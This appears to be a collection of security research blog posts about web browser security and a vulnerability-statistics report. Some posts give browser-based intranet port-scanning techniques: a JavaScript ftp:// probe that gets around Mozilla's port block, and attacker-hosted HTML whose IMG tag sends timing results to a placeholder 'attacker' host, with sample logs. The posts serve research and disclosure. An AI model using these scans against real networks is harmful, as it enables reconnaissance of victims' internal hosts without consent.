You see, when a user logs in to a website, the first thing they must have is a reasonable assurance that the web page they're visiting is from whom it claims to be. It could easily be a phishing site. Without a visually trustable location bar, SSL/TLS lock symbol, or HTML hyperlink display, the user could be tricked into handing over their username/password to an attacker. Which of course could in turn be used to illegally access our websites. Website security depends on the user not being *easily* tricked, but this does happen hundreds or maybe thousands of times a day.

This moves us to transport security. We don’t want sensitive data compromised by an attacker sniffing the browser-to-web-server connection. If for some reason the browser has a faulty implementation of SSL/TLS (it happens), the crypto can be cracked and any sensitive data our website collects could fall into the wrong hands. Our website may remain safe and sound, but the data isn’t, and that’s really the whole idea. Websites are relying on the browser to have a solid SSL/TLS implementation, otherwise back to plaintext we go.

In exchange for a correct username/password combination, the user’s browser receives a cookie storing their session ID. The browser is the protector of this important key because if it’s stolen, then likely the user account and their data go with it. The website is trusting that the same-origin and cookie security policies imposed by the browser will keep the session ID (cookies) safe. But anyone familiar with XSS, using some JavaScript and Flash Malware, knows that is hardly the case. And besides, browser vulnerabilities routinely expose this information through exploits. No joy here.

Another example: websites rely on web browsers to safeguard history/cache/bookmarks/passwords and everything else containing sensitive information or granting access to it. And as we well know, all of these areas are again routinely exposed through browser vulnerability exploits or clever JavaScript Malware hacks. Inside the browser walls is everything an attacker needs to hack our websites. Websites become highly dependent on web browsers keeping this data safe. Unfortunately they rarely do.

So maybe we are already trusting client-side (web browser) security. And with the web security models being set-up the way they are, we probably have to keep doing so for years to come.

Web Application Security Risk Report

Update 2: More coverage by Larry Greenemeier of InformationWeek, E-Tailers Leaving Money On The Table Thanks To Weak Web Sites.

Update
: Kelly Jackson Higgins, from Dark Reading, posted some quality coverage in Where the Bugs Are.

It’s been a busy morning. I presented two popular webinars on "First Look at New Web Application Security Statistics - The Top 10 Web Application Vulnerabilities and their Impact on the Enterprise" [slides]. We've been offering the WhiteHat Sentinel Service for several years and in that time we've performed thousands of assessments on real-world websites. As a result we’ve collected a huge database of custom web application vulnerabilities, which to the best of my knowledge is the largest anywhere. Starting January 2007 we’ll be releasing a Web Application Security Report containing statistics derived from that data. Instead of waiting the two months, we figured we’d release some statistics early as a taste of things to come:

"Web applications are now the top target for malicious attacks. Why? Firstly, 8 out of 10 websites have serious vulnerabilities making them easy targets for criminals seeking to cash in on cyber crime. Secondly, enterprises that want to reduce the risk of financial losses, brand damage, theft of intellectual property, legal liability, among others, are often unaware that these web application vulnerabilities exist, their possible business impact, and how they are best prevented. Currently, this lack of knowledge limits visibility into an enterprise’s actual security posture. In an effort to deliver actionable information, and raise awareness of actual web application threats, WhiteHat Security is introducing the Web Application Security Risk Report, published quarterly beginning in January 2007."

Webinar slides and the full report [registration required] are available for download.

We're seeing more statistics and reviews released to the public. This is great news because it helps us all understand more about what’s going on, what’s working, and what’s not. The benefit of assessing hundreds of websites every month is you get to see vulnerability metrics as web applications change. The hardest part is pulling out the data that's meaningful. If anyone has ideas for stats they’d like to see, let us know. In the meantime, I’ll post some of the graphics below, enjoy!

The types of vulnerabilities we focus on (vulnerability stack) and the level of comprehensiveness (technical vulnerabilities and business logic flaws)


How bad is it out there? 8 out of 10 websites are vulnerable, but how severe are the vulnerabilities?



The likelihood of a website having a high or medium severity vulnerability, by class.




Blocking META refresh with LINK tags

While researching Browser Port Scanning without JavaScript, I wanted to find a way to get the browser to kill its connections and move on to the next IP address, similar to JavaScript Port Scanning with window.stop(), since the timeout period is quite long and I needed to speed up the process. I figured a meta refresh, after waiting 5 seconds, was the way to go. Like so:

<* head>
<* meta http-equiv="refresh" content="5;url=http://foo/">
<* /head>

<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />

What I found was that while the LINK HTTP request is waiting, the META refresh won’t fire until it is resolved. Weird. Again, I don’t know how this is useful, yet, but it could be for something in the future.

Bypassing Mozilla Port Blocking

To protect against the HTML Form Protocol Attack, which would allow the browser to send arbitrary data to most TCP ports, Mozilla restricted connections to several dozen ports. For example, click on http://jeremiahgrossman.blogspot.com:22/ See the screen shot:



I think it was RSnake who found this first, but the blocking mechanism seems to be applied only to the http protocol handler. Odd. Using the ftp protocol handler, we can bypass the block like so: ftp://jeremiahgrossman.blogspot.com:22/ If the port is up, it'll connect; if not, it'll time out.

I believe this technique could be used to improve JavaScript Port Scanning, where we’re currently only scanning horizontally for web servers (80/443). Instead we may be able to perform vertical port scans on the remaining ports and bypass the imposed restrictions. Perhaps it's also useful for the Browser Port Scanning without JavaScript technique.
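As a rough, untested sketch of how the ftp handler might plug into a timing-based probe: point a hidden IFRAME at an ftp:// URL and watch how long it takes to come back. Whether load/error events fire at all for ftp: URLs varies, so the fallback timeout does most of the work, and the 5-second threshold is a guess.

// Hedged sketch (untested): probe an arbitrary TCP port via the ftp handler,
// sidestepping the http port blocklist, and classify it by response timing.
function probePort(host, port, callback) {
  var start = new Date().getTime();
  var reported = false;
  var frame = document.createElement("iframe");
  frame.style.display = "none";

  function report(result) {
    if (reported) return;
    reported = true;
    document.body.removeChild(frame);
    callback(port, result, new Date().getTime() - start);
  }

  // A quick connection-refused error suggests the port is closed; hanging
  // until the timeout suggests something accepted the connection.
  frame.onload = function () { report("responded"); };
  frame.onerror = function () { report("refused"); };
  setTimeout(function () { report("timeout"); }, 5000);

  frame.src = "ftp://" + host + ":" + port + "/";
  document.body.appendChild(frame);
}

// Example: check whether anything is listening on port 22 of an intranet host.
probePort("192.168.1.100", 22, function (port, result, ms) {
  alert("Port " + port + ": " + result + " after " + ms + "ms");
});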

SCRIPT tag JavaScript error message suppression

While researching different hacks and attack/defense techniques, it’s common to uncover odd behavior in software, especially in web browsers. I’ve also found that various oddities point me in the direction of vulnerabilities, or sometimes tricks that become useful as part of another hack. Anyway, here’s some strangeness in Firefox that others might find interesting.

Use a SCRIPT tag to SRC in any invalid file type, like an image.

<* script src="1.jpg"><* /script>




To suppress the error message, use a type attribute with any value:

<* script src="1.jpg" type="put_anything_here"><* /script>

How is this useful? I don't know, but it's weird, eh?

More to come.

Tuesday, November 28, 2006

Browser Port Scanning without JavaScript

Update 2: Ilia Alshanetsky has already found a way to improve upon the technique using the obscure content-type "multipart/x-mixed-replace". There's a great write up and some PHP PoC code to go with it. Good stuff! RSnake has been covering the topic as well.

Update
: A sla.ckers.org project thread has been created to exchange results. Already the first post has some interesting bits.

Since my Intranet Hacking Black Hat (Vegas 2006) presentation, I've spent a lot of time researching HTML-only browser malware since many experts now disable JavaScript. Imagine that! Using some timing tricks, I "think" I've discovered a way to perform Intranet Port Scanning with a web browser using only HTML. Unfortunately time constraints are preventing me from finishing the proof-of-concept code anytime soon. Instead of waiting I decided to describe the idea so maybe others could try it out. Here's how it's supposed to work... these are the two important lines of HTML:

The HTML is hosted on an attacker-controlled website.
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
<* img src="http://attacker/check_time.pl?ip=192.168.1.100&start= epoch_timer" />

The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is to act as a timer and data transport mechanism back to the attacker. Once the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial “epoch_timer” value (when the web page was dynamically generated), it's possible to tell if the host is up. If the time difference is less than, say, 5 seconds then the host is likely up; if more, then the host is probably down (the browser waited for the timeout). Simple.

Example (attacker web server logs)

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762279
(3 second delay) - Host is up

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762286
(10 second delay) - Host is down
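The server-side check is just epoch arithmetic. The original check_time.pl is a Perl CGI that isn't shown here, so below is the same decision logic sketched in JavaScript using the example numbers above; the 5-second threshold follows the rule of thumb described earlier.

// Classify a host as up or down from the delay between page generation
// (the "start" epoch embedded in the IMG URL) and when the IMG request arrives.
function classifyHost(startEpoch, arrivalEpoch, thresholdSeconds) {
  var delay = arrivalEpoch - startEpoch;
  // Short delay: the LINK request resolved quickly, so the host is up.
  // Long delay: the browser waited out the connection timeout, so the host is down.
  return delay < (thresholdSeconds || 5) ? "up" : "down";
}

classifyHost(1164762276, 1164762279); // "up" (3 second delay)
classifyHost(1164762276, 1164762286); // "down" (10 second delay)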

A few browser/network nuances have caused stability and accuracy headaches, plus the technique is somewhat slow to scan with. To fork the connections I used multiple IFRAMEs, which seemed to work.

<* iframe src="/portscan.pl?ip=192.168.201.100" scrolling="no"><* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.101" scrolling="no">
<* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.102" scrolling="no">
<* /iframe>

I'm pretty sure most of the issues can be worked around, but like I said, I lack the time. If anyone out there takes this up as a cause, let me know, I have some Perl scraps if you want them.